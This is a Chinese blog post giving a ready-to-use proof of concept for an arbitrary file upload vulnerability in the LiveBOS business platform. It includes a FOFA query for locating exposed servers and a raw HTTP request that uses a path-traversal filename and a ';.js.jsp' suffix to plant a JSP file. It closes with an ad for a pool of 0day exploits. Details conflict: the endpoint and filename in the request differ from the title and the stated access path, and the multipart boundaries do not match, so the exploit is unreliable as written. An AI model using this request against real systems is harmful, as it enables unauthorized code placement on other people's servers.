LiveBOS-UploadImage.do-任意文件上传漏洞_livebos漏洞

作者：运维做开发 | 2024-08-17 15:34:42

踩

livebos漏洞

介绍：

LiveBOS灵动业务架构平台，是面向对象的业务支撑平台与建模工具。在LiveBos的UploadImage.do接口中，发现了一处任意文件上传漏洞，攻击者可利用该漏洞上传任意文件。

fofa：

body="Power by LiveBOS"

poc：


POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../rce.jsp"
Content-Type: image/jpeg
 
<%@ page import="java.io.File" %>
<%
 out.println("pppppppppoooooooocccccccccccc");
 String filePath = application.getRealPath(request.getServletPath());
 new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--

连接地址：/1.jsp;.js.jsp

内部福利介绍-更新啦，网络安全百分之八十的资源都可以在这找到！涵盖了POC库、账号共享、文档库、资源网获取、会员专属群，做你的网络安全资源大全！

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至9000+

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/运维做开发/article/detail/993340

推荐阅读

相关标签